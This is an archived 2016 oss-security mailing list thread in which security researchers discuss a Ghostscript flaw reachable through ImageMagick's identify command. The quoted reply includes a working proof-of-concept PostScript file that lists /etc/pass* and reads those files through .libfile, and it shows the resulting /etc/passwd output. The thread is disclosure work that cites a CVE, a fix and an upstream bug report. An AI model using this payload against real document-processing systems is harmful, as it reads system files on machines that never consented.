Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAJ_zFk+T7TD7Ke=k7kbRbxGfnyARQXX1YxGehshKj11RxQD6BA@mail.gmail.com>
Date: Thu, 29 Sep 2016 05:02:19 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Wed, Sep 28, 2016 at 11:25 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
>
> * Tavis Ormandy:
>
> > Here is the code I'm testing with (Note: I really don't know much
> > postscript - and I hate it).
> >
> > $ cat test.ps
> > /dumpname {
> >     dup             % copy filename
> >     dup             % copy filename
> >     print           % print filename
> >     (\n) print      % print newline
> >     status          % stat filename
> >     {
> >         (stat succeeded\n) print
> >         ( ctime:) print
> >         64 string cvs print
> >         ( atime:) print
> >         64 string cvs print
> >         ( size:) print
> >         64 string cvs print
> >         ( blocks:) print
> >         64 string cvs print
> >         (\n) print
> >         (\n) print
> >     }{
> >         (unable to stat\n\n) print
> >     } ifelse
> >     .libfile        % open as library
> >     {
> >         (.libfile returned file\n\n) print
> >         64 string readstring
> >         pop         % discard result (should proably test)
> >         print
> >         (\n) print
> >     }{
> >         (.libfile returned string\n) print
> >         print
> >         (\n) print
> >     } ifelse
> > } def
> >
> > (/etc/pass*) /dumpname load 256 string filenameforall
>
> filenameforall was fixed as part of this:
>
>   http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
>   http://bugs.ghostscript.com/show_bug.cgi?id=694724
>
> This also covers getenv and has already been assigned CVE-2013-5653.

Thanks Florian, that explains it, although the distros do not appear
to have picked that patch up.

>
> > $ identify test.ps
> > /etc/passwd
> > stat succeeded
> >  ctime:1474998792 atime:1474998792 size:2662 blocks:8
> >
> > .libfile returned file
>
> .libfile is not yet fixed upstream.  I reported this upstream:
>
>   http://bugs.ghostscript.com/show_bug.cgi?id=697169

Thanks - seems like bad news for any automated image/document processing.

Tavis.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.